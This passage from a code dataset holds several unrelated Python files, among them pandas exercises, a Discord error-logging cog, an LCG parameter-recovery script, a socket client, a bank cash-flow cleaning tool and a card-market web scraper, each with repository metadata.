'cyrus@mail.com'\n ],\n 'phone': [\n '(992) 914-1234',\n '(345) 234-4567',\n '(233) 123-9900',\n '(678) 233-0988',\n '(653) 111-5690'\n ],\n 'favorite': [\n False,\n False,\n True,\n False,\n True\n ]\n },\n index=[1, 2, 3, 4, 5]\n)\n\n# print(mountain_head.sort_values(ascending=False))\n# contacts['phone'][2] = '(555) 666-8899'\n# contacts.__getitem__('phone').__setitem__([2], '(555) 666-7788')\n# print(contacts['phone'])\n\ntmp = pd.read_html(io='https://www.statisticstimes.com/tech/top-computer-languages.php',\n attrs={'id': 'table_id1'},\n index_col='Jun 2022')\n# tmp[0]['Change'][1] = '100'\ntmp[0]['nums'] = [i for i in range(1, len(tmp[0]) + 1)]\n\n# tmp[0].append(pd.Series(['Jun 2022', 'Change', 'Programming language', 'Share', 'Trends'],\n# [29, 'Yes', 'Python2', '30%', '+2.5%']),\n# ignore_index=True)\n# tmp[0] = pd.concat([tmp[0], pd.DataFrame.from_records([{'Change': 'Yes',\n# 'Programming language': 'Python',\n# 'Share': '30%',\n# 'Trends': '+2.5%'\n# }])])\n#\n# tmp[0].drop(['Change'], axis=1, inplace=True)\n# print(tmp[0].dropna())\n# print(tmp[0].fillna(0.0))\n# print(tmp[0].replace('↑↑↑', 1.0))\n# print(tmp[0].drop_duplicates('Change'))\n\ndate = pd.date_range(start=datetime.now().date(), periods=7)\ndate_view = pd.Series(\n [i for i in range(len(date))],\n index=pd.date_range(start=datetime.now().date(), periods=7).sort_values(ascending=False)\n)\nprint(tmp[0])\n","repo_name":"Ivan-Grigorev/Data_Analysis_trainee","sub_path":"main_pd.py","file_name":"main_pd.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"70467282161","text":"import pandas as pd\n\nreader = pd.read_csv('data/servicelogs', iterator=True)\ntry:\n df = reader.get_chunk(100000000)\nexcept StopIteration:\n print(\"Iteration is stopped.\")\n\nloop = True\nchunkSize = 100000\nchunks = []\nwhile loop:\n try:\n chunk = reader.get_chunk(chunkSize)\n chunks.append(chunk)\n except StopIteration:\n loop = False\n print(\"Iteration is stopped.\")\ndf = pd.concat(chunks, ignore_index=True)\n\n\n\"\"\"\n使用不同分块大小来读取再调用 pandas.concat 连接DataFrame,将chunkSize设置在1000万条左右。\n\"\"\"","repo_name":"kingreatwill/penter","sub_path":"pandas/big_file.py","file_name":"big_file.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"75"} +{"seq_id":"27049692300","text":"# Description\n# 中文\n# English\n# Given an array of integers, find a contiguous subarray which has the largest sum.\n\n# The subarray should contain at least one number.\n\n# Have you met this question in a real interview? 
\n# Example\n# Example1:\n\n# Input: [−2,2,−3,4,−1,2,1,−5,3]\n# Output: 6\n# Explanation: the contiguous subarray [4,−1,2,1] has the largest sum = 6.\n# Example2:\n\n# Input: [1,2,3,4]\n# Output: 10\n# Explanation: the contiguous subarray [1,2,3,4] has the largest sum = 10.\n\nimport sys\n\n\nclass Solution:\n    \"\"\"\n    @param nums: A list of integers\n    @return: An integer indicating the sum of the max subarray\n    \"\"\"\n    def maxSubArray(self, nums):\n        # write your code here\n        now_sum, min_sum, max_sum = 0, 0, -sys.maxsize\n        for num in nums:\n            now_sum += num\n            max_sum = max(max_sum, now_sum - min_sum)\n            min_sum = min(min_sum, now_sum)\n        return max_sum","repo_name":"runzezhang/Code-NoteBook","sub_path":"lintcode/0041-maximum-subarray.py","file_name":"0041-maximum-subarray.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28831023754","text":"import json, datetime, pprint, traceback\n\nimport discord\nfrom discord.ext import commands\n\nfrom common import *\nfrom database import *\nfrom VakLogger import *\n\n\n#The cog itself\n\nclass Logger(commands.Cog):\n\t\"\"\" A cog that allows its client bot to watch member statuses \"\"\"\n\t\n\tdef __init__(self, client):\n\t\tself.client = client\n\t\t\n\t\t \n\t@commands.Cog.listener()\n\tasync def on_command_error(self, ctx, error):\n\t\t\t\n\t\t#error is an error built into discord.py, so analyze the original error\n\t\tif (isinstance(error, commands.errors.CommandInvokeError)):\n\t\t\tlogInfo(\"CommandInvokeError raised\")\n\t\t\terror = error.original\n\n\t\tif (ctx.guild):\n\t\t\tserverID = ctx.guild.id\n\t\telse:\n\t\t\tserverID = None\n\n\t\tauthorID = ctx.author.id\n\n\t\t#Respond to error\n\t\t#If the error is that permissions are missing, very little info needs to be logged\n\t\tif (isinstance(error, commands.errors.MissingPermissions)):\n\t\t\tawait ctx.send(str(error))\n\t\t\tlogInfo(str(error), {\"Server\": serverID, \"Author\": authorID})\n\t\t\treturn\n\n\t\t#Something unforeseen happened, so document to the maximum\n\t\telse:\n\t\t\terrorData = logError(error, {\"Server\": serverID, \"Author\": authorID})\n\n\t\t\tawait ctx.send(f\"[{errorData['Error Time']}] The following error has occurred and been logged: \\\"{str(error)}\\\"\")\n\n\t\tlogInfo(f\"Error has been handled successfully!\\n\")\n\n\t@commands.command()\n\tasync def error(self, ctx, **args):\n\t\tawait ctx.send(\"Testing error logging...\")\n\t\traise Exception(\"Testing error logging!\")\n\t\t\nasync def setup(client):\n\tawait client.add_cog(Logger(client))","repo_name":"AnuraagGodavari/Lil-Buddy","sub_path":"Lil-Buddy/Cogs/errorhandler.py","file_name":"errorhandler.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38257130831","text":"import os\nimport pandas as pd\nimport numpy as np\nimport math\n\n#ODO correction\ndef odometers_gb(path=\"\", filename=\"\"):\n    #download / clean / prepare df from dir\n    #df = pd.read_excel(os.path.join(path,filename), skiprows=6)\n    df = pd.read_excel(os.path.join(path,filename)) # needed to rework the data from WO\n    df.loc[:,\"ODOMETER_FW\"] = df.loc[:,\"ODOMETER_FW\"].fillna(0).astype('int')\n    df.dropna(inplace = True)\n    df.sort_values(by=['VEHICLE_ID_FW','TRANSACTION_DATE_FW','TRANSACTION_TIME_FW'], ascending=[True,False,False],inplace=True)\n    df['ODOMETER_FW'] = df['ODOMETER_FW'].apply(lambda x: 0 if x <1000 else x)\n    
df.set_index(['VEHICLE_ID_FW'], inplace=True)\n\n #create of unique Vehicle IDs list\n ids = df.index.unique().tolist()\n #create new df to store corrected data from dawnloaded df\n df_corrected = pd.DataFrame()\n\n #odo correction and storing data in df_corrected\n for i in ids:\n temp_df = df.loc[i]\n odo = df.loc[i,\"ODOMETER_FW\"].tolist()\n \n if type(odo) == list:\n odo.sort(reverse=True)\n \n for j in range(len(odo)-1):\n if abs(odo[j] - odo[j+1]) > 9999 or odo[j] - odo[j+1] < 0:\n odo[j+1] = 0\n \n temp_df.loc[:,\"ODOMETER_FW\"] = odo #temp_df[\"ODOMETER_FW\"] = odo\n df_corrected = df_corrected.append(temp_df)\n \n else:\n df_corrected = df_corrected.append(temp_df)\n \n df_corrected.reset_index(inplace=True)\n df_corrected.rename(columns = {'index':'VEHICLE_ID_FW'}, inplace = True)\n\n return df_corrected\n\nif __name__ == '__main__':\n odometers_gb()","repo_name":"Wiktor90/PANDAS-App","sub_path":"gb_odo.py","file_name":"gb_odo.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29016208801","text":"import math\nfrom functools import reduce\n\n\nclass LCG:\n def __init__(self, seed, a, c, m):\n self.last_number = seed\n self.a = a\n self.c = c\n self.m = m\n\n def get_next_int(self):\n self.last_number = (self.last_number * self.a + self.c) % self.m\n return self.last_number\n\n\ndef try_to_find_unknown_m(numbers):\n diffs = [s1 - s0 for s0, s1 in zip(numbers, numbers[1:])]\n zeroes = [t2 * t0 - t1 * t1 for t0, t1, t2 in zip(diffs, diffs[1:], diffs[2:])]\n return abs(reduce(math.gcd, zeroes))\n\n\ndef try_to_retrieve_lcg_parameters(generator):\n random_numbers = list()\n random_numbers.append(generator.get_next_int())\n random_numbers.append(generator.get_next_int())\n random_numbers.append(generator.get_next_int())\n random_numbers.append(generator.get_next_int())\n random_numbers.append(generator.get_next_int())\n random_numbers.append(generator.get_next_int())\n m = try_to_find_unknown_m(random_numbers)\n a = find_unknown_a(random_numbers, m)\n c = find_unknown_c(random_numbers, a, m)\n return a, c, m\n\n\ndef find_next_number(numbers, a, c, m):\n assert len(numbers) >= 1\n return (numbers[len(numbers) - 1] * a + c) % m\n\n\ndef find_unknown_c(numbers, a, m):\n assert len(numbers) >= 3\n return (numbers[2] - (a * numbers[1])) % m\n\n\ndef find_inverse_for_x_in_m_ring(x, m):\n d, _, y = egcd(m, x)\n assert d == 1\n return y\n\n\ndef egcd(a, b):\n if b == 0:\n return a, 1, 0\n else:\n d, x, y = egcd(b, a % b)\n d, x, y = d, y, x - (math.floor(a / b) * y)\n return d, x, y\n\n\ndef find_unknown_a(numbers, m):\n assert len(numbers) >= 4\n divider = (numbers[0] - numbers[1])\n divider_inverse = find_inverse_for_x_in_m_ring(divider, m)\n return ((numbers[1] - numbers[2]) * divider_inverse) % m\n\n\ndef predict_next_lgc_value(last, a, c, m):\n return (last * a + c) % m\n\n\n# returns true if given generator is an instance of LGC\ndef recognize_lgc(generator):\n for i in range(1, 1000):\n try:\n a, c, m = try_to_retrieve_lcg_parameters(generator)\n generated_num = generator.get_next_int()\n for j in range(1, 20):\n predicted_num = predict_next_lgc_value(generated_num, a, c, m)\n generated_num = generator.get_next_int()\n assert (generated_num == predicted_num)\n\n return True\n except AssertionError:\n pass\n return 
False\n","repo_name":"GorskiBartosz/Cracking_Pseudo_Random_Generators","sub_path":"lcg.py","file_name":"lcg.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40816396914","text":"from bert_serving.client import BertClient\nimport csv\nimport json\n\n\ndef sample_pooling(vec):\n new_vec = []\n for i in range(128):\n new_vec.append(sum(vec[i*8:i*8+7]))\n return new_vec\n\nfile_path = './data/decagon_data/'\n\nbc = BertClient()\nSE_set = set()\nwith open(file_path + 'bio-decagon-combo.csv') as csv_file:\n sreader = csv.reader(csv_file, delimiter=',')\n next(sreader, None)\n for line in sreader:\n SE_set.add(line[3])\n\nse_emb = dict()\nfor se in SE_set:\n # print(len(bc.encode([se])[0]))\n se_emb[se] = sample_pooling(bc.encode([se])[0])\n\n\nwith open(file_path+'se_embedding.json', 'w') as outfile:\n json.dump(se_emb,outfile,ensure_ascii=False)\n outfile.write('\\n')\n\n","repo_name":"Hanchen-Wang/GoGNN","sub_path":"SE_preprocess.py","file_name":"SE_preprocess.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"75"} +{"seq_id":"72765806642","text":"import pandas as pd\nimport handle_csv\nfrom handle_csv import utility\nfrom os.path import join, dirname\n\n\ndef comb_and_field_standardize(raw_cf_folder_dir, field_map_dir):\n # 抓取 每个流水表的 文件路径。\n filesdir = utility.get_filesdir_under_a_folder(raw_cf_folder_dir, '.csv', '.xlsx', '.xls')\n\n for raw_cf_dir in filesdir:\n # 如流水原文件,是excel格式,则处理转换为csv格式,并返回转换得文件的路径。如非excel格式,返回原路径。\n convert_cf_directory = utility.convert_excel_to_csv(raw_cf_dir)\n\n # 加载单个流水CSV文件。\n raw_cf_csv = handle_csv.CashFlowHandler(convert_cf_directory)\n\n # 加载原始流水表段标准化的映射表。\n raw_cf_csv.do_field_standardize(field_map_dir)\n\n # 将结果写入csv文件。\n raw_cf_csv.write_csvfile(directory=raw_cf_dir, lines=raw_cf_csv.field_std_lines, combine=True, crefloder=True)\n\n return raw_cf_csv.writen_directory\n\n\ndef data_standardize(directory):\n def datetime_data_standardize(dataframe):\n \"\"\"1.汇总<交易日期时间>、<交易日期>、<交易时间>字段的不完整时间信息,重填补全<交易日期时间>。后删除<交易日期>、<交易时间>字段。\n 2.<交易日期时间>字段,字符串日期化。\"\"\"\n df = dataframe.copy()\n total_rows = len(df.index)\n datetime = list(df[\"交易日期时间\"])\n date = list(df[\"交易日期\"].astype(str))\n time = list(df[\"交易时间\"].astype(str))\n datetime_clean = []\n bad_lines = []\n\n for i in range(total_rows):\n if not pd.isnull(datetime[i]):\n _datetime = datetime[i]\n else:\n _date = date[i] if not date[i] == 'nan' else ''\n _time = time[i] if not time[i] == 'nan' else ''\n _time = (6 - len(_time)) * '0' + _time\n _datetime = _date + ' ' + _time\n # 日期格式明显不对的(不以2开头),是badlines。目前仅适用于去掉交行的表尾行。\n if not utility.is_date(_datetime):\n bad_lines.append(i)\n else:\n datetime_clean.append(_datetime)\n df = df[~df.index.isin(bad_lines)]\n df.loc[:, \"交易日期时间\"] = datetime_clean\n df.loc[:, \"交易日期时间\"] = pd.to_datetime(df[\"交易日期时间\"])\n df.drop([\"交易日期\", \"交易时间\"], axis=1, inplace=True)\n\n return df\n\n def amount_to_numeric(dataframe):\n df = dataframe.copy()\n # 1.<借方发生额>、<贷方发生额>、<收支额正负值>、<收支额绝对值>、<余额>字段,字符串数字化。\n df.loc[:, \"借方发生额\"] = pd.to_numeric(df[\"借方发生额\"])\n df.loc[:, \"贷方发生额\"] = pd.to_numeric(df[\"贷方发生额\"])\n df.loc[:, \"收支额正负值\"] = pd.to_numeric(df[\"收支额正负值\"])\n df.loc[:, \"收支额绝对值\"] = pd.to_numeric(df[\"收支额绝对值\"])\n df.loc[:, \"余额\"] = pd.to_numeric(df[\"余额\"])\n\n return df\n\n def amount_data_standardize(dataframe):\n \"\"\"1.<借方发生额>、<贷方发生额>、<收支额正负值>、<收支额绝对值>、<余额>字段,字符串数字化。\n 
2.汇总<收支方向>、<借方发生额>、<贷方发生额>、<收支额正负值>、<收支额绝对值>字段的不完整时间信息,重填补全各字段。\"\"\"\n df = dataframe.copy()\n total_rows = len(df.index)\n # # 1.<借方发生额>、<贷方发生额>、<收支额正负值>、<收支额绝对值>、<余额>字段,字符串数字化。\n df.loc[:, \"借方发生额\"] = pd.to_numeric(df[\"借方发生额\"], errors='coerce')\n df.loc[:, \"贷方发生额\"] = pd.to_numeric(df[\"贷方发生额\"], errors='coerce')\n df.loc[:, \"收支额正负值\"] = pd.to_numeric(df[\"收支额正负值\"], errors='coerce')\n df.loc[:, \"收支额绝对值\"] = pd.to_numeric(df[\"收支额绝对值\"], errors='coerce')\n df.loc[:, \"余额\"] = pd.to_numeric(df[\"余额\"], errors='coerce')\n\n # 2.汇总<收支方向>、<借方发生额>、<贷方发生额>、<收支额正负值>、<收支额绝对值>字段的不完整时间信息,重填补全各字段。\n sign = list(df[\"收支方向\"])\n debit = list(df[\"借方发生额\"])\n credit = list(df[\"贷方发生额\"])\n net_amount = list(df[\"收支额正负值\"])\n abs_amount = list(df[\"收支额绝对值\"])\n sign_clean = []\n debit_clean = []\n credit_clean = []\n net_amount_clean = []\n\n for i in range(total_rows):\n if not pd.isnull(sign[i]):\n if sign[i] in ['来账','收入']:\n _sign = '贷'\n elif sign[i] in ['往账','支出']:\n _sign = '借'\n else:\n _sign = sign[i]\n else:\n if (not pd.isnull(debit[i])) and (debit[i] != 0):\n _sign = '借'\n elif (not pd.isnull(credit[i])) and (credit[i] != 0):\n _sign = '贷'\n elif net_amount[i] < 0:\n _sign = '借'\n else:\n _sign = '贷'\n sign_clean.append(_sign)\n for i in range(total_rows):\n if not pd.isnull(net_amount[i]):\n _net_amount = net_amount[i]\n else:\n if (not pd.isnull(debit[i])) and (debit[i] != 0):\n _net_amount = - debit[i]\n elif (not pd.isnull(credit[i])) and (credit[i] != 0):\n _net_amount = credit[i]\n elif not pd.isnull(abs_amount[i]):\n _net_amount = (-1 if sign_clean[i] == '借' else 1) * abs_amount[i]\n # 支付宝流水出现过借、贷方都为0的,为开户第1笔流水。\n elif (debit[i] == 0) and credit[i] == 0:\n _net_amount = 0\n else:\n print (df.iloc[[i-1]])\n raise ValueError(f\"第{i}行,net_amount无法按逻辑计算得到,请检查!\")\n net_amount_clean.append(_net_amount)\n for i in range(total_rows):\n if (not pd.isnull(debit[i])) or (not pd.isnull(credit[i])):\n _debit = debit[i] if (not pd.isnull(debit[i])) else 0\n _credit = credit[i] if (not pd.isnull(credit[i])) else 0\n else:\n _debit = - net_amount_clean[i] if sign_clean[i] == '借' else 0\n _credit = net_amount_clean[i] if sign_clean[i] == '贷' else 0\n debit_clean.append(_debit)\n credit_clean.append(_credit)\n abs_amount_clean = [abs(i) for i in net_amount_clean]\n df.loc[:, \"收支方向\"] = sign_clean\n df.loc[:, \"借方发生额\"] = debit_clean\n df.loc[:, \"贷方发生额\"] = credit_clean\n df.loc[:, \"收支额正负值\"] = net_amount_clean\n df.loc[:, \"收支额绝对值\"] = abs_amount_clean\n\n return df\n\n def counterpart_data_standardize(dataframe):\n \"\"\"1.汇总<付款人名称>、<付款人账号>、<收款人账号>、<收款人名称>,补全<对方账号>、<对方账户名称>字段。\n 后删除<付款人名称>、<付款人账号>、<收款人账号>、<收款人名称>字段。\"\"\"\n df = dataframe.copy()\n total_rows = len(df.index)\n payer = list(df[\"付款人名称\"])\n payer_acc = list(df[\"付款人账号\"])\n payee = list(df[\"收款人名称\"])\n payee_acc = list(df[\"收款人账号\"])\n counterpart = list(df[\"对方账户名称\"])\n counterpart_acc = list(df[\"对方账号\"])\n sign = list(df[\"收支方向\"])\n counterpart_clean = []\n counterpart_acc_clean = []\n\n for i in range(total_rows):\n if not pd.isnull(payer[i]) and sign[i] == '贷':\n _counterpart = payer[i]\n _counterpart_acc = payer_acc[i]\n elif not pd.isnull(payee[i]) and sign[i] == '借':\n _counterpart = payee[i]\n _counterpart_acc = payee_acc[i]\n else:\n _counterpart = counterpart[i]\n _counterpart_acc = counterpart_acc[i]\n counterpart_clean.append(_counterpart)\n counterpart_acc_clean.append(_counterpart_acc)\n\n df.loc[:, \"对方账户名称\"] = counterpart_clean\n df.loc[:, \"对方账号\"] = counterpart_acc_clean\n df.drop([\"付款人名称\", 
\"付款人账号\", \"收款人账号\", \"收款人名称\"], axis=1, inplace=True)\n\n return df\n\n def create_sn(dataframe):\n \"\"\"1.将<交易时间日期>字段转换为yyyymmdd格式的字符串,字段。\n 基于<本方账号>、分组,求每行的组内累计序号,字段。\n 以<本方账号>__的格式,生成字段。并挪至首列。\n 后删除字段。\"\"\"\n df = dataframe.copy()\n df['本方账号'] = df['本方账号'].astype(str)\n df['yyyymmdd'] = df[\"交易日期时间\"].dt.strftime('%Y%m%d')\n df['cumcount'] = df.groupby(['本方账号', 'yyyymmdd']).cumcount() + 1\n df['cumcount'] = df['cumcount'].astype(str)\n\n df['sn'] = df[['本方账号', 'yyyymmdd', 'cumcount']].agg(\"_\".join, axis=1)\n temp_cols = df.columns.tolist()\n new_cols = temp_cols[-1:] + temp_cols[:-1]\n df = df[new_cols]\n\n df.drop([\"yyyymmdd\", \"cumcount\"], axis=1, inplace=True)\n\n return df\n\n def sort_within_each_acc(dataframe):\n \"\"\"各账号的流水,有正向顺序的(月初->月末),也有逆向顺序的(月末—>月初)。\n 1.本函数判定各账号是否正序。判定条件:第2行发生额+第1行余额-第2行余额,是否为0。\n 2.本函数依据判定结果,重新排序各账号流水的顺序。\"\"\"\n df = dataframe.copy()\n df_sorted = pd.DataFrame()\n acc_set = df['本方账号'].unique()\n for acc in acc_set:\n ascending = True\n df_acc = df.loc[df['本方账号'] == acc].copy()\n if df_acc.shape[0] > 1:\n bal_1st_line = df_acc.iloc[0].loc['余额']\n bal_2nd_line = df_acc.iloc[1].loc['余额']\n net_amount_2nd_line = df_acc.iloc[1].loc['收支额正负值']\n diff_abs = abs(bal_1st_line + net_amount_2nd_line - bal_2nd_line)\n if diff_abs < 0.001:\n pass\n else:\n ascending = False\n else:\n pass\n\n df_acc.sort_index(ascending=ascending, inplace=True)\n df_acc.reset_index(drop=True, inplace=True)\n df_sorted = pd.concat([df_sorted.copy(), df_acc], axis=0)\n\n return df_sorted\n\n def fix_debit_negative(dataframe):\n df = dataframe.copy()\n acc_set = df['本方账号'].unique()\n for acc in acc_set:\n debit = df.loc[df['本方账号'] == acc, \"借方发生额\"]\n debit = pd.to_numeric(debit, errors='coerce')\n try: \n if max(debit) <= 0:\n df.loc[df['本方账号'] == acc, \"借方发生额\"] = -debit\n else:\n pass\n except TypeError:\n print(\"acc:\", acc)\n print(\"debit\", debit)\n def typeof(x):\n return type(x)\n debit_type = debit.apply(typeof)\n print(\"debit\", debit_type)\n raise\n return df\n\n def sub_main(_directory):\n # 前步骤已得到字段统一的流水文件。用pandas读取该文件。\n df = pd.read_csv(_directory, dtype={\"本方账号\": str, \"对方账号\": str, \"付款人账号\": str, \"收款人账号\": str, \"流水号\": str, })\n # 执行数值标准化,分如下步骤。步骤顺序不可改动,后步骤默认使用前步骤的清理结果。\n # 数值标准化_第一步:日期时间。\n df = datetime_data_standardize(df)\n #df = amount_to_numeric(df)\n # 数值标准化_第二步:借方发生额恒为负的账号,改为正。\n df = fix_debit_negative(df)\n # 数值标准化_第三步:收支方向、收支金额。\n df = amount_data_standardize(df)\n # 数值标准化_第四步:对方名称、对方账号。\n df = counterpart_data_standardize(df)\n # 数值标准化_第五步:对倒序的账号的流水按正序重排。\n df = sort_within_each_acc(df)\n # 创建流水sn,格式<本方账号_yyyymmdd_组内累计序号>。\n df = create_sn(df)\n # 清理任务结束。将清理后的结果,写入csv文件。\n output_dir = join(dirname(_directory),'output_cleaned.csv')\n df.to_csv(output_dir, mode='w', index=False, encoding='utf-8-sig')\n print(\"字段数值计算和数值格式统一后的合并银行流水:\", output_dir)\n\n sub_main(directory)\n\n\ndef main():\n while True:\n raw_cf_folder_dir = input(\"请录入流水所在文件夹的路径:\")\n if raw_cf_folder_dir != \"\":\n break\n while True:\n field_map_dir = input(\"请录入流水字段映射表的路径:\")\n if field_map_dir != \"\":\n break\n field_std_cf_dir = comb_and_field_standardize(raw_cf_folder_dir, field_map_dir)\n data_standardize(field_std_cf_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zhuyizhang/cashflow_standardize","sub_path":"cash_flow_stdize.py","file_name":"cash_flow_stdize.py","file_ext":"py","file_size_in_byte":13644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} 
+{"seq_id":"17441668659","text":"#!C:/Python36/python.exe\r\n\r\nimport socket\r\n \r\ndef Main():\r\n # in case of muliple devices connected over same network change loacalhost to ip of the network\r\n host = 'localhost'\r\n port = 80\r\n \r\n mySocket = socket.socket()\r\n mySocket.connect((host,port))\r\n \r\n message = input(\" -> \")\r\n \r\n while message != 'q':\r\n mySocket.send(message.encode())\r\n data = mySocket.recv(1024).decode()\r\n \r\n print ('Received from server: ' + data)\r\n \r\n message = input(\" -> \")\r\n \r\n mySocket.close()\r\n \r\nif __name__ == '__main__':\r\n Main()\r\n","repo_name":"gautamgupta1811/chatapp","sub_path":"Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39615475853","text":"def number_length(int):\n '''You have a positive integer. Try to find out how many digits it has?\n\nInput: A positive Int\n\nOutput: An Int.'''\n\n num = len(str(int))\n return num\n\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(number_length(1009))\n","repo_name":"fernandaveiga/checkIO_solutions","sub_path":"INICIATION/number_length.py","file_name":"number_length.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26021832691","text":"import maya.cmds as cmds\nimport zbw_rig as rig\n\n\"\"\"\ncreates an fk control chain on selected joints (in order). select control reference object (to be copied) and then object to receive controls, then run. \n\"\"\"\n\n#get ctrl\nctrl = cmds.ls(sl=True)[0]\n\n#get each jnt\njnts = cmds.ls(sl=True)[1:]\ngrps= []\ncldrn = []\n#grp orient ctrl for each jnt\n#get jnt name\nfor jnt in jnts:\n \n #duplicate control and rename, then group orient\n thisCtrl = cmds.duplicate(ctrl, name=jnt.rstrip(\"_JNT\") + \"_CTRL\")[0]\n \n thisGrp = cmds.group(n=thisCtrl+ \"_GRP\", em=True)\n cmds.parent(thisCtrl, thisGrp)\n \n trans = cmds.xform(jnt, q=True, ws = True, rp = True)\n rot = cmds.xform(jnt, q=True, ws = True, ro=True)\n \n #cmds.xform(thisGrp,ws=True, s = (1,-1,0))\n cmds.xform(thisGrp, ws=True, t = trans)\n cmds.xform(thisGrp, ws=True, ro = rot)\n cmds.parentConstraint(thisCtrl, jnt, mo=True)\n \n grps.append(thisGrp)\n cldrn.append(thisCtrl)\n \nfor x in range(len(grps)-1, 0, -1):\n cmds.parent(grps[x], cldrn[x-1])\n #print x, x-1\n \n\n ","repo_name":"zethwillie/python_wip","sub_path":"fkChainMaker.py","file_name":"fkChainMaker.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32154707127","text":"# linked list cycle\n# Write a function, linked_list_cycle, that takes in the head of a linked list as an argument. 
The function should return a boolean indicating whether or not the linked list contains a cycle.\n\n\n# My solution:\ndef linked_list_cycle(head):\n    if head == None:\n        return False\n    slow, fast = head, head.next\n    \n    while fast and fast.next:\n        if slow == fast or fast.next == slow:\n            return True\n        slow = slow.next\n        fast = fast.next.next\n    return False\n\n# Alvin's solution:\ndef linked_list_cycle(head):\n    first_iteration = True\n    \n    fast = head\n    slow = head\n    while fast is not None and fast.next is not None:\n        if slow is fast and not first_iteration:\n            return True\n        first_iteration = False\n        slow = slow.next\n        fast = fast.next.next\n    \n    return False\n","repo_name":"Dhaaaf/Leetcoding","sub_path":"structy/mixedrecall/3.linkedListCycle.py","file_name":"3.linkedListCycle.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30386029435","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Jun 07 20:05:48 2022\n\n@author: Jerome Yutai Shen\n\n\"\"\"\nfrom common_classes import ListNode\n\nclass Solution:\n    def addTwoNumbers(self, l1, l2) -> ListNode:\n        dummy = ListNode(None)\n        tail = dummy\n        carry = 0\n        while l1 or l2 or carry:\n\n            if l1:\n                carry += l1.val\n                l1 = l1.next\n            if l2:\n                carry += l2.val\n                l2 = l2.next\n\n            digit, carry = carry % 10, carry // 10\n            node = ListNode(digit)\n            tail.next, tail = node, node\n\n        return dummy.next\n\n    \"\"\" \"\"\"\n\n\nclass Solution2:\n    def addTwoNumbers(self, l1, l2) -> ListNode:\n        s1, s2 = 0, 0\n        while l1:\n            s1 = s1 * 10 + l1.val\n            l1 = l1.next\n        while l2:\n            s2 = s2 * 10 + l2.val\n            l2 = l2.next\n        res = s1 + s2\n        dummy = ListNode(0)\n        head = dummy\n        string = str(res)[::-1]\n        for k in range(len(string)):\n            tmp = string[k]\n            dummy.next = ListNode(int(tmp))\n            dummy = dummy.next\n        return head.next","repo_name":"jerome-yutai-shen/leetcode_challenges","sub_path":"2_add_two_numbers.py","file_name":"2_add_two_numbers.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21855243273","text":"import undetected_chromedriver as uc\nimport pandas as pd\nimport random\nimport re\n\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nfrom bs4 import BeautifulSoup\n\nimport scrapers\n\n# As you can maybe see, the core has been heavily simplified\n# multithreading is quite the bi**h and making it work was tough.\n\nuser_agents = []\nurls_occurrences_dictionnary = {}\ntotal_number_of_url = 0\noutput_data = []\nglobal _signals\n\n\ndef file_to_list(filename):\n    with open(filename, 'r') as file:\n        lines = file.read().splitlines()\n    return lines\n\n\ndef load_user_agents():\n    global user_agents\n    user_agents = file_to_list(\"chrome_useragents.csv\")\n\n\ndef get_header():\n    user_agent = random.choice(user_agents)\n    return {\n        'Host': 'www.cardmarket.com',\n        'User-Agent': user_agent,\n        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',\n    }\n\n\ndef request(url, num, total):\n    # randomized header data for realism\n    try:\n        # options (header data, headless)\n        options = uc.ChromeOptions()\n        options.add_argument('--headless')\n        options.add_argument(\"user-agent=\" + random.choice(user_agents))\n\n        # driver is what's dwelling in the web\n        driver = uc.Chrome(options=options)\n\n        # *drum rolls*\n        driver.get(url)\n\n        # 
wait for the title of the page to be there\n        element = WebDriverWait(driver, 70).until(\n            EC.presence_of_element_located((By.XPATH, '/html/body/main/div[3]/div[1]/h1')))\n        _signals.emit(element.text + \"\\n[\" + num + \"/\" + total + \"]\")\n        soup = BeautifulSoup(driver.page_source, 'lxml')\n        list_scrap = scrapers.CMSoupScraper(url, soup)\n        output_data.append(list_scrap)\n        ''' # Temporarily commented, i will use the previous code for now, then switch there\n\t\t# because this snippet is objectively better, shorter, clearer, and processes less info\n\t\tdl_elements = driver.find_element(By.CSS_SELECTOR,\".labeled\")\n\t\tinner_html = dl_elements.get_attribute(\"innerHTML\")\n\t\tdd_elements = re.findall(r'', inner_html)\n\t\tdt_elements = re.findall(r'', inner_html)\n\t\tif (len(dd_elements) != len(dt_elements)):\n\t\t\tprint(\"Uh Oh ... (it seems like the scraping failed somewhere)\")\n\t\telse :\n\t\t\tout_data = []\n\t\t\tfor i in range(0, 